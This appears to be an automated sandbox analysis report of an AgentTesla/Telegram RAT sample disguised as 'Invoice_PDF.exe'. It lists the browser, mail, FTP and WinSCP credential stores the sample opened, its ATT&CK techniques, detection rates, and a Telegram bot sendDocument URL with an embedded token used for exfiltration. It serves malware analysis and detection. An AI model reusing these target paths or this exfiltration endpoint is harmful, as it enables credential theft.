Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Users\user\Desktop\Invoice_PDF.exe VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Telegram RAT
Source: Yara match | File source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR

Yara detected AgentTesla
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Invoice_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4130420.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4219800.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4130420.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4219800.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match | File source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR

Remote Access Functionality:

Yara detected Telegram RAT
Source: Yara match | File source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR

Yara detected AgentTesla
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Invoice_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4130420.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Invoice_PDF.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4219800.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4130420.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_PDF.exe.4219800.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR

Mitre Att&ck Matrix

Each row lists one technique per tactic column; the trailing digits are the report's signature counts for that technique, and "-" marks an empty cell.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Path Interception | Process Injection 112 | Masquerading 1 | OS Credential Dumping 2 | Query Registry 1 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Web Service 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | Credentials in Registry 1 | Security Software Discovery 211 | Remote Desktop Protocol | Archive Collected Data 11 | Exfiltration Over Bluetooth | Encrypted Channel 11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 131 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Local System 2 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 112 | NTDS | Virtualization/Sandbox Evasion 131 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | System Information Discovery 114 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact

Behavior Graph

Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Invoice_PDF.exe | 45% | Virustotal | -
Invoice_PDF.exe | 49% | Metadefender | -
Invoice_PDF.exe | 62% | ReversingLabs | ByteCode-MSIL.Backdoor.Androm
Invoice_PDF.exe | 100% | Avira | HEUR/AGEN.1141888

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
3.0.Invoice_PDF.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8
3.0.Invoice_PDF.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
3.0.Invoice_PDF.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8
3.2.Invoice_PDF.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
3.0.Invoice_PDF.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8
3.0.Invoice_PDF.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://PHCGWf.com | 0% | Avira URL Cloud | safe
http://www.fontbureau.comE8 | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
https://api.telegram.org4 | 0% | URL Reputation | safe
http://www.fontbureau.comoitu | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
https://87HMfkdDwCo1wEm.org | 0% | Avira URL Cloud | safe
http://www.fontbureau.como | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.fontbureau.comgrito | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.chinhdo.com | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
https://87HMfkdDwCo1wEm.orgx | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | - | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument | false | - | high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://www.apache.org/licenses/LICENSE-2.0Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                            high
                            http://www.fontbureau.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designersGInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                high
                                http://DynDns.comDynDNSInvoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/?Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.orgInvoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpfalse
                                    high
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haInvoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers?Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                      high
                                      https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocumentdocument-----Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                                        high
                                        http://PHCGWf.comInvoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.comE8Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.tiro.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designersInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.goodfont.co.krInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.comlInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sajatypeworks.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
http://www.typography.netD | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
http://www.fontbureau.com/designers/cabarga.htmlN | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: high
http://www.founder.com.cn/cn/cThe | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
http://www.galapagosdesign.com/staff/dennis.htm | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
http://fontfabrik.com | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
http://www.founder.com.cn/cn | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
https://api.telegram.org4 | source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
http://www.fontbureau.com/designers/frere-jones.html | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: high
http://www.fontbureau.comoitu | source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
http://www.jiyu-kobo.co.jp/ | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
https://87HMfkdDwCo1wEm.org | source: Invoice_PDF.exe, 00000003.00000002.527180057.00000000035A0000.00000004.00000001.sdmp | malicious: false | reputation: unknown (Avira URL Cloud: safe)
http://www.fontbureau.como | source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
http://www.galapagosdesign.com/DPlease | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
http://www.fontbureau.com/designers8 | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: high
http://www.fontbureau.comgrito | source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
http://www.fonts.com | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: high
http://www.sandoll.co.kr | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
http://www.urwpp.deDPlease | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
http://www.zhongyicts.com.cn | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
http://api.telegram.org | source: Invoice_PDF.exe, 00000003.00000002.527261346.00000000035B9000.00000004.00000001.sdmp | malicious: false | reputation: high
http://www.chinhdo.com | source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmp | malicious: false | reputation: high
http://www.sakkal.com | source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
https://87HMfkdDwCo1wEm.orgx | source: Invoice_PDF.exe, 00000003.00000002.527027069.000000000354C000.00000004.00000001.sdmp | malicious: false | reputation: unknown (Avira URL Cloud: safe)
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | malicious: false | reputation: unknown (URL Reputation: safe)
https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/ | source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | malicious: false | reputation: high

                                                        Contacted IPs


                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false

                                                        General Information

